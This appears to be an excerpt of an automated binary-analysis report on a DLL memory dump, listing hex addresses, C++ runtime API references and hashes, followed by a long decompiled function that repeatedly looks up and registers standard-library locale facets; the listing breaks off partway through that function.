0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e
0x6e1990e2
0x6e1990e2
0x6e1990e5
0x6e1990e9
0x6e1990ed
0x6e1990fa
0x6e199102
0x6e199104
0x00000000
0x6e199104
0x6e1990cb
0x6e1990cb
0x00000000
0x6e1990cb
0x6e1990c9
0x6e19904d
0x6e19904d
0x6e199050
0x6e199054
0x6e199058
0x6e199065
0x6e19906d
0x6e19906f
0x00000000
0x6e19906f
0x6e199036
0x6e199036
0x00000000
0x6e199036
0x6e199034
0x6e198fb8
0x6e198fb8
0x6e198fbb
0x6e198fbf
0x6e198fc3
0x6e198fd0
0x6e198fd8
0x6e198fda
0x00000000
0x6e198fda
0x6e198fa1
0x6e198fa1
0x00000000
0x6e198fa1
0x6e198f9f
0x6e198f23
0x6e198f23
0x6e198f26
0x6e198f2a
0x6e198f2e
0x6e198f3b
0x6e198f43
0x6e198f45
0x00000000
0x6e198f45
0x6e198f0c
0x6e198f0c
0x00000000
0x6e198f0c
0x6e198f0a
0x6e198e8e
0x6e198e8e
0x6e198e91
0x6e198e95
0x6e198e99
0x6e198ea6
0x6e198eae
0x6e198eb0
0x00000000
0x6e198eb0
0x6e198e77
0x6e198e77
0x00000000
0x6e198e77
0x6e198e75

APIs

__EH_prolog3.LIBCMT ref: 6E198E3E
std::_Lockit::_Lockit.LIBCPMT ref: 6E198E48

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

ctype.LIBCPMT ref: 6E198E82
std::_Facet_Register.LIBCPMT ref: 6E198E99
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198EB9
Concurrency::cancel_current_task.LIBCPMT ref: 6E198EC6

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
String ID:
API String ID: 130866940-0
Opcode ID: 5058d2979e4de2d214d29e5045a79bd959132a891d0ce8ab62bf86f801d6a6b8
Instruction ID: 39386851b63e0e6d124aae01dcb901c93bfb69ba2ab5e600cca973946e8a786b
Opcode Fuzzy Hash: 5058d2979e4de2d214d29e5045a79bd959132a891d0ce8ab62bf86f801d6a6b8
Instruction Fuzzy Hash: 1701C439D00619DFCB05DBE4C8206FEB779AF84314F244809E811AB290CF349AC9FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198ECC, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E198ECC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t230;
				void* _t422;
				signed int _t611;
				void* _t666;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t692;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				void* _t724;

				_t503 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t724 - 0x14, 0);
				_t687 =  *0x6e221720; // 0x0
				 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
				 *(_t724 - 0x10) = _t687;
				_t230 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(__ebx, 0x6e2216cc, __edi, _t687));
				_t668 = _t230;
				if(_t230 != 0) {
					L5:
					E6E18F30C(_t724 - 0x14);
					return E6E1A9D88(_t668);
				} else {
					if(_t687 == 0) {
						_push( *((intOrPtr*)(_t724 + 8)));
						_push(_t724 - 0x10);
						__eflags = E6E19AB03(__ebx, _t668, _t687) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t503, _t668, _t687, 8);
							E6E18F2A5(_t724 - 0x14, 0);
							_t688 =  *0x6e2216f0; // 0x0
							 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
							 *(_t724 - 0x10) = _t688;
							_t669 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216a4, _t668, _t688));
							__eflags = _t669;
							if(_t669 != 0) {
								L12:
								E6E18F30C(_t724 - 0x14);
								return E6E1A9D88(_t669);
							} else {
								__eflags = _t688;
								if(_t688 == 0) {
									_push( *((intOrPtr*)(_t724 + 8)));
									_push(_t724 - 0x10);
									__eflags = E6E19AB6B(_t503, _t669, _t688) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t503, _t669, _t688, 8);
										E6E18F2A5(_t724 - 0x14, 0);
										_t689 =  *0x6e221724; // 0x0
										 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
										 *(_t724 - 0x10) = _t689;
										_t670 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216d0, _t669, _t689));
										__eflags = _t670;
										if(_t670 != 0) {
											L19:
											E6E18F30C(_t724 - 0x14);
											return E6E1A9D88(_t670);
										} else {
											__eflags = _t689;
											if(_t689 == 0) {
												_push( *((intOrPtr*)(_t724 + 8)));
												_push(_t724 - 0x10);
												__eflags = E6E19ABD3(_t503, _t670, _t689) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t503, _t670, _t689, 8);
													E6E18F2A5(_t724 - 0x14, 0);
													_t690 =  *0x6e2216f4; // 0x0
													 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
													 *(_t724 - 0x10) = _t690;
													_t671 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216a8, _t670, _t690));
													__eflags = _t671;
													if(_t671 != 0) {
														L26:
														E6E18F30C(_t724 - 0x14);
														return E6E1A9D88(_t671);
													} else {
														__eflags = _t690;
														if(_t690 == 0) {
															_push( *((intOrPtr*)(_t724 + 8)));
															_push(_t724 - 0x10);
															__eflags = E6E19AC3B(_t503, _t671, _t690) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t503, _t671, _t690, 8);
																E6E18F2A5(_t724 - 0x14, 0);
																_t691 =  *0x6e221728; // 0x0
																 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																 *(_t724 - 0x10) = _t691;
																_t672 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216d4, _t671, _t691));
																__eflags = _t672;
																if(_t672 != 0) {
																	L33:
																	E6E18F30C(_t724 - 0x14);
																	return E6E1A9D88(_t672);
																} else {
																	__eflags = _t691;
																	if(_t691 == 0) {
																		_push( *((intOrPtr*)(_t724 + 8)));
																		_push(_t724 - 0x10);
																		__eflags = E6E19ACA3(_t503, _t672, _t691) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t503, _t672, _t691, 8);
																			E6E18F2A5(_t724 - 0x14, 0);
																			_t692 =  *0x6e2216f8; // 0x0
																			 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																			 *(_t724 - 0x10) = _t692;
																			_t673 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216ac, _t672, _t692));
																			__eflags = _t673;
																			if(_t673 != 0) {
																				L40:
																				E6E18F30C(_t724 - 0x14);
																				return E6E1A9D88(_t673);
																			} else {
																				__eflags = _t692;
																				if(_t692 == 0) {
																					_push( *((intOrPtr*)(_t724 + 8)));
																					_push(_t724 - 0x10);
																					__eflags = E6E19AD0B(_t503, _t673, _t692) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t503, _t673, _t692, 8);
																						E6E18F2A5(_t724 - 0x14, 0);
																						_t693 =  *0x6e221730; // 0x0
																						 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																						 *(_t724 - 0x10) = _t693;
																						_t674 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216dc, _t673, _t693));
																						__eflags = _t674;
																						if(_t674 != 0) {
																							L47:
																							E6E18F30C(_t724 - 0x14);
																							return E6E1A9D88(_t674);
																						} else {
																							__eflags = _t693;
																							if(_t693 == 0) {
																								_push( *((intOrPtr*)(_t724 + 8)));
																								_push(_t724 - 0x10);
																								__eflags = E6E19AD73(_t503, _t674, _t693) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t503, _t674, _t693, 8);
																									E6E18F2A5(_t724 - 0x14, 0);
																									_t694 =  *0x6e22172c; // 0x0
																									 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																									 *(_t724 - 0x10) = _t694;
																									_t675 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216d8, _t674, _t694));
																									__eflags = _t675;
																									if(_t675 != 0) {
																										L54:
																										E6E18F30C(_t724 - 0x14);
																										return E6E1A9D88(_t675);
																									} else {
																										__eflags = _t694;
																										if(_t694 == 0) {
																											_push( *((intOrPtr*)(_t724 + 8)));
																											_push(_t724 - 0x10);
																											__eflags = E6E19ADF7(_t503, _t675, _t694) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t503, _t675, _t694, 8);
																												E6E18F2A5(_t724 - 0x14, 0);
																												_t695 =  *0x6e221700; // 0x0
																												 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																												 *(_t724 - 0x10) = _t695;
																												_t676 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216b4, _t675, _t695));
																												__eflags = _t676;
																												if(_t676 != 0) {
																													L61:
																													E6E18F30C(_t724 - 0x14);
																													return E6E1A9D88(_t676);
																												} else {
																													__eflags = _t695;
																													if(_t695 == 0) {
																														_push( *((intOrPtr*)(_t724 + 8)));
																														_push(_t724 - 0x10);
																														__eflags = E6E19AE7C(_t503, _t676, _t695) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t503, _t676, _t695, 8);
																															E6E18F2A5(_t724 - 0x14, 0);
																															_t696 =  *0x6e2216fc; // 0x0
																															 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																															 *(_t724 - 0x10) = _t696;
																															_t677 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216b0, _t676, _t696));
																															__eflags = _t677;
																															if(_t677 != 0) {
																																L68:
																																E6E18F30C(_t724 - 0x14);
																																return E6E1A9D88(_t677);
																															} else {
																																__eflags = _t696;
																																if(_t696 == 0) {
																																	_push( *((intOrPtr*)(_t724 + 8)));
																																	_push(_t724 - 0x10);
																																	__eflags = E6E19AF00(_t503, _t677, _t696) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t503, _t677, _t696, 8);
																																		E6E18F2A5(_t724 - 0x14, 0);
																																		_t697 =  *0x6e221710; // 0x0
																																		 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																																		 *(_t724 - 0x10) = _t697;
																																		_t678 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216bc, _t677, _t697));
																																		__eflags = _t678;
																																		if(_t678 != 0) {
																																			L75:
																																			E6E18F30C(_t724 - 0x14);
																																			return E6E1A9D88(_t678);
																																		} else {
																																			__eflags = _t697;
																																			if(_t697 == 0) {
																																				_push( *((intOrPtr*)(_t724 + 8)));
																																				_push(_t724 - 0x10);
																																				__eflags = E6E19AF85(_t503, _t678, _t697) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ec3ec, _t503, _t678, _t697, 8);
																																					E6E18F2A5(_t724 - 0x14, 0);
																																					_t698 =  *0x6e2216e8; // 0x0
																																					 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																																					 *(_t724 - 0x10) = _t698;
																																					_t679 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e22169c, _t678, _t698));
																																					__eflags = _t679;
																																					if(_t679 != 0) {
																																						L82:
																																						E6E18F30C(_t724 - 0x14);
																																						return E6E1A9D88(_t679);
																																					} else {
																																						__eflags = _t698;
																																						if(_t698 == 0) {
																																							_push( *((intOrPtr*)(_t724 + 8)));
																																							_push(_t724 - 0x10);
																																							__eflags = E6E19AFED(_t503, _t679, _t698) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E161CB5(__eflags);
																																								asm("int3");
																																								E6E1A9DBF(0x6e1ec3ec, _t503, _t679, _t698, 8);
																																								E6E18F2A5(_t724 - 0x14, 0);
																																								_t699 =  *0x6e221714; // 0x0
																																								 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																																								 *(_t724 - 0x10) = _t699;
																																								_t680 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216c0, _t679, _t699));
																																								__eflags = _t680;
																																								if(_t680 != 0) {
																																									L89:
																																									E6E18F30C(_t724 - 0x14);
																																									return E6E1A9D88(_t680);
																																								} else {
																																									__eflags = _t699;
																																									if(_t699 == 0) {
																																										_push( *((intOrPtr*)(_t724 + 8)));
																																										_push(_t724 - 0x10);
																																										__eflags = E6E19B055(_t503, _t680, _t699) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E161CB5(__eflags);
																																											asm("int3");
																																											E6E1A9DBF(0x6e1ec3ec, _t503, _t680, _t699, 8);
																																											E6E18F2A5(_t724 - 0x14, 0);
																																											_t700 =  *0x6e221718; // 0x0
																																											 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																																											 *(_t724 - 0x10) = _t700;
																																											_t681 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216c4, _t680, _t700));
																																											__eflags = _t681;
																																											if(_t681 != 0) {
																																												L96:
																																												E6E18F30C(_t724 - 0x14);
																																												return E6E1A9D88(_t681);
																																											} else {
																																												__eflags = _t700;
																																												if(_t700 == 0) {
																																													_push( *((intOrPtr*)(_t724 + 8)));
																																													_push(_t724 - 0x10);
																																													__eflags = E6E19B0BD(_t503, _t681, _t700) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E161CB5(__eflags);
																																														asm("int3");
																																														E6E1A9DBF(0x6e1ec3ec, _t503, _t681, _t700, 8);
																																														E6E18F2A5(_t724 - 0x14, 0);
																																														_t701 =  *0x6e221734; // 0x0
																																														 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																																														 *(_t724 - 0x10) = _t701;
																																														_t682 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216e0, _t681, _t701));
																																														__eflags = _t682;
																																														if(_t682 != 0) {
																																															L103:
																																															E6E18F30C(_t724 - 0x14);
																																															return E6E1A9D88(_t682);
																																														} else {
																																															__eflags = _t701;
																																															if(_t701 == 0) {
																																																_push( *((intOrPtr*)(_t724 + 8)));
																																																_push(_t724 - 0x10);
																																																__eflags = E6E19B138(_t503, _t682, _t701) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E161CB5(__eflags);
																																																	asm("int3");
																																																	E6E1A9DBF(0x6e1ec3ec, _t503, _t682, _t701, 8);
																																																	E6E18F2A5(_t724 - 0x14, 0);
																																																	_t702 =  *0x6e221704; // 0x0
																																																	 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																																																	 *(_t724 - 0x10) = _t702;
																																																	_t683 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216b8, _t682, _t702));
																																																	__eflags = _t683;
																																																	if(_t683 != 0) {
																																																		L110:
																																																		E6E18F30C(_t724 - 0x14);
																																																		return E6E1A9D88(_t683);
																																																	} else {
																																																		__eflags = _t702;
																																																		if(_t702 == 0) {
																																																			_push( *((intOrPtr*)(_t724 + 8)));
																																																			_push(_t724 - 0x10);
																																																			__eflags = E6E19B1A4(_t503, _t683, _t702) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E161CB5(__eflags);
																																																				asm("int3");
																																																				E6E1A9DBF(0x6e1ec3ec, _t503, _t683, _t702, 8);
																																																				E6E18F2A5(_t724 - 0x14, 0);
																																																				_t703 =  *0x6e221738; // 0x0
																																																				 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																																																				 *(_t724 - 0x10) = _t703;
																																																				_t684 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e2216e4, _t683, _t703));
																																																				__eflags = _t684;
																																																				if(_t684 != 0) {
																																																					L117:
																																																					E6E18F30C(_t724 - 0x14);
																																																					return E6E1A9D88(_t684);
																																																				} else {
																																																					__eflags = _t703;
																																																					if(_t703 == 0) {
																																																						_push( *((intOrPtr*)(_t724 + 8)));
																																																						_push(_t724 - 0x10);
																																																						__eflags = E6E19B210(_t503, _t684, _t703) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E161CB5(__eflags);
																																																							asm("int3");
																																																							E6E1A9DBF(0x6e1ec3ec, _t503, _t684, _t703, 8);
																																																							E6E18F2A5(_t724 - 0x14, 0);
																																																							_t704 =  *0x6e221708; // 0x0
																																																							 *(_t724 - 4) =  *(_t724 - 4) & 0x00000000;
																																																							 *(_t724 - 0x10) = _t704;
																																																							_t685 = E6E162171( *((intOrPtr*)(_t724 + 8)), E6E161F29(_t503, 0x6e221698, _t684, _t704));
																																																							__eflags = _t685;
																																																							if(_t685 != 0) {
																																																								L124:
																																																								E6E18F30C(_t724 - 0x14);
																																																								return E6E1A9D88(_t685);
																																																							} else {
																																																								__eflags = _t704;
																																																								if(_t704 == 0) {
																																																									_push( *((intOrPtr*)(_t724 + 8)));
																																																									_push(_t724 - 0x10);
																																																									_t422 = E6E19B284(_t503, _t685, _t704);
																																																									_pop(_t611);
																																																									__eflags = _t422 - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E161CB5(__eflags);
																																																										asm("int3");
																																																										E6E1A9DBF(0x6e1ecb1a, _t503, _t685, _t704, 4);
																																																										_t705 = _t611;
																																																										 *(_t724 - 0x10) = _t705;
																																																										 *((intOrPtr*)(_t705 + 4)) =  *((intOrPtr*)(_t724 + 0xc));
																																																										_push( *((intOrPtr*)(_t724 + 0x14)));
																																																										_t223 = _t724 - 4;
																																																										 *_t223 =  *(_t724 - 4) & 0x00000000;
																																																										__eflags =  *_t223;
																																																										 *_t705 = 0x6e1f225c;
																																																										 *((char*)(_t705 + 0x28)) =  *((intOrPtr*)(_t724 + 0x10));
																																																										E6E19F3D8(_t503, _t611, _t666, _t685, _t705,  *_t223);
																																																										return E6E1A9D88(_t705,  *((intOrPtr*)(_t724 + 8)));
																																																									} else {
																																																										_t685 =  *(_t724 - 0x10);
																																																										 *(_t724 - 0x10) = _t685;
																																																										 *(_t724 - 4) = 1;
																																																										E6E1911C1(__eflags, _t685);
																																																										 *0x6e1ee1b4();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																																										 *0x6e221708 = _t685;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t685 = _t704;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t684 =  *(_t724 - 0x10);
																																																							 *(_t724 - 0x10) = _t684;
																																																							 *(_t724 - 4) = 1;
																																																							E6E1911C1(__eflags, _t684);
																																																							 *0x6e1ee1b4();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																																																							 *0x6e221738 = _t684;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t684 = _t703;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t683 =  *(_t724 - 0x10);
																																																				 *(_t724 - 0x10) = _t683;
																																																				 *(_t724 - 4) = 1;
																																																				E6E1911C1(__eflags, _t683);
																																																				 *0x6e1ee1b4();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																																																				 *0x6e221704 = _t683;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t683 = _t702;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t682 =  *(_t724 - 0x10);
																																																	 *(_t724 - 0x10) = _t682;
																																																	 *(_t724 - 4) = 1;
																																																	E6E1911C1(__eflags, _t682);
																																																	 *0x6e1ee1b4();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																																																	 *0x6e221734 = _t682;
																																																	goto L103;
																																																}
																																															} else {
																																																_t682 = _t701;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t681 =  *(_t724 - 0x10);
																																														 *(_t724 - 0x10) = _t681;
																																														 *(_t724 - 4) = 1;
																																														E6E1911C1(__eflags, _t681);
																																														 *0x6e1ee1b4();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																																														 *0x6e221718 = _t681;
																																														goto L96;
																																													}
																																												} else {
																																													_t681 = _t700;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t680 =  *(_t724 - 0x10);
																																											 *(_t724 - 0x10) = _t680;
																																											 *(_t724 - 4) = 1;
																																											E6E1911C1(__eflags, _t680);
																																											 *0x6e1ee1b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																																											 *0x6e221714 = _t680;
																																											goto L89;
																																										}
																																									} else {
																																										_t680 = _t699;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t679 =  *(_t724 - 0x10);
																																								 *(_t724 - 0x10) = _t679;
																																								 *(_t724 - 4) = 1;
																																								E6E1911C1(__eflags, _t679);
																																								 *0x6e1ee1b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																																								 *0x6e2216e8 = _t679;
																																								goto L82;
																																							}
																																						} else {
																																							_t679 = _t698;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t678 =  *(_t724 - 0x10);
																																					 *(_t724 - 0x10) = _t678;
																																					 *(_t724 - 4) = 1;
																																					E6E1911C1(__eflags, _t678);
																																					 *0x6e1ee1b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
																																					 *0x6e221710 = _t678;
																																					goto L75;
																																				}
